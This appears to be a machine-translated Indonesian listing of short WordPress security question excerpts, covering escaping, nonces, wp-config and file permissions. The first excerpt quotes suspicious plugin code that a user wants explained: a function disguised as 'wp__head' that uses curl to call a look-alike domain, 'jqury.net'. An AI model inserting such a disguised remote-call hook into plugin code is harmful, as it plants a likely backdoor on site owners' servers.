Saya menemukan ini di sebuah plugin. Apa fungsinya? Apa ini berbahaya? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");...
Apakah menjaga wp-admin/install.phpdan wp-admin/install-helper.phpkeamanan bocor pada versi wordpress yang lebih baru? Secara default izin file pada file-file itu adalah 644. Jika ada kebocoran, tolong
Seperti yang ada saat ini, pertanyaan ini tidak cocok untuk format Tanya Jawab kami. Kami berharap jawaban didukung oleh fakta, referensi, atau keahlian, tetapi pertanyaan ini kemungkinan akan mengundang debat, argumen, polling, atau diskusi panjang. Jika Anda merasa bahwa
Saya telah melihat kode tetapi saya tidak bisa melihat ada yang keluar dari fungsi seperti the_title the_content the_excerptdll. Saya mungkin tidak membacanya dengan benar. Apakah saya perlu keluar dari fungsi-fungsi ini dalam pengembangan tema seperti: esc_html ( the_title () ) Sunting:...
Saya melihat bahwa SVG diblokir secara default di pengunggah media dan Anda harus menambahkannya sebagai tipe MIME yang didukung di functions.php. Apa alasan keamanan di balik
Kami mengalami beberapa masalah dengan pengembang eksternal. Kami ingin membatasi akses ke wp-adminsitus hanya untuk akses internal (melalui VPN ). Sederhananya itu tidak akan diserang oleh pengguna eksternal. Kami dapat menghitung admin dari situs dan tidak ingin mereka di-phishing. Pengembang...
Mengkonfigurasi WordPress untuk memperbarui dalam aplikasi (yaitu WordPress) sangat ideal bagi saya karena kemudahannya. Meskipun demikian, saya bermasalah dengan persyaratan. Kolom yang diminta yang muncul setelah menginstal ssh2 untuk php tidak hanya meminta kunci publik saya, tetapi juga kunci...
Melihat Codex untuk wp_insert_post () itu menyatakan bahwa fungsi ini "... membersihkan variabel, melakukan beberapa pemeriksaan, mengisi variabel yang hilang seperti tanggal / waktu, dll." (EDIT: Saya memperbarui entri Codex untuk memasukkan contoh yang lebih kuat. itu termasuk keamanan serta...
Hanya pertanyaan singkat yang mungkin membantu sedikit keamanan. Saya perhatikan bahwa file readme.html memiliki nomor versi yang terdaftar. Ini muncul kembali setelah setiap peningkatan dan begitu juga dengan licence.txt, dan wp-config-sample.php. Apakah ada cara mudah untuk membuat WordPress...
Hal ini membuat coding saya sulit. Codex Wordpress beralasan menggunakan esc_url dengan berbicara sedikit tentang keamanan. Tetapi apakah itu benar-benar sepadan dengan masalahnya? Misalnya, apa manfaat keamanan praktis yang penting dengan menggunakan <?php echo esc_url( home_url( '/' ) );...
Situasi awal Untuk situs yang saya setting, saya sedang mencari ke seluruh bidang pengamanan unggahan / unduhan dan membatasi akses ke sana berdasarkan peran / kemampuan pengguna. Tentu saja saya telah membaca beberapa pertanyaan sebelumnya terkait dengan topik (umum) di sini, untuk alasan...
Tampaknya mereka melakukan jenis pekerjaan yang hampir sama. Begitu... Ketika saya harus menggunakan esc_html()bukan
Saya mencoba mengamankan blog wordpress saya. Saya membaca beberapa posting di web yang harus saya ubah table_prefixdan sembunyikan wp-config.php. Namun, saya tidak mengerti? Apa yang bisa dilakukan penyerang dengan saya wp-config.php? Maksud saya ada konfigurasi db saya, tetapi penyerang...
Saya mencari untuk menggunakan beberapa API dan banyak yang datang dengan kunci, kunci rahasia dan kata sandi yang diperlukan untuk bekerja. Di mana di WordPress Anda dapat menyimpan informasi itu? Dengan asumsi siapa pun dapat meretas DB Anda, apakah ada WordPress untuk menyimpan informasi itu...
Ini mungkin pertanyaan noob TAPI dengarkan saya - bukankah poin menggunakan Nonce untuk melindungi dari hal-hal seperti scrappers (phpcurl scrappers dll)? Tapi Nonce saya mencetak di kepala dokumen seperti: /* <![CDATA[ */ var nc_ajax_getpost = { ...stuff... getpostNonce: "8a3318a44c" }; /*...
Saya telah meninjau banyak informasi tentang tema WP dan keamanan plugin dan memahami konsep bahwa Anda harus melarikan diri atribut dan nilai-nilai HTML dalam tema dan plugin. Saya telah melihat bloginfo()dan echo get_bloginfo()menggunakan standar dan di dalam esc_html()atau
Saya ingin memfilter setiap permintaan HTTP yang dilakukan URI melalui API HTTP. Gunakan kasing: Pemeriksaan pembaruan WordPress masuk ke http://api.wordpress.org/core/version-check/1.6/ , tetapi https://api.wordpress.org/core/version-check/1.6/ juga berfungsi, dan saya ingin untuk menggunakan...
Saya telah membaca banyak artikel blog WordPress Security di mana Pakar Keamanan merekomendasikan beberapa langkah khusus untuk berhati-hati ketika seseorang khawatir tentang keamanan situs WordPress mereka. Salah satunya adalah: Kiat Keamanan WordPress: Hapus plugin yang tidak perlu, yang...
Baru saja memposting plugin baru: Tidak Ada Kata Sandi Saat ini saya telah menandai beta karena masuk ke platform adalah masalah sensitif dan saya tidak ingin merilis sesuatu yang mungkin memiliki celah keamanan. Jadi, inilah pertanyaan saya: Apakah aman? Saya telah melakukan yang berikut untuk...
Saya baru saja menjalankan WP di server saya sendiri. Saya tidak mencoba untuk mengunci lebih banyak hal. Izin apa yang harus dimiliki pengguna db ke WP db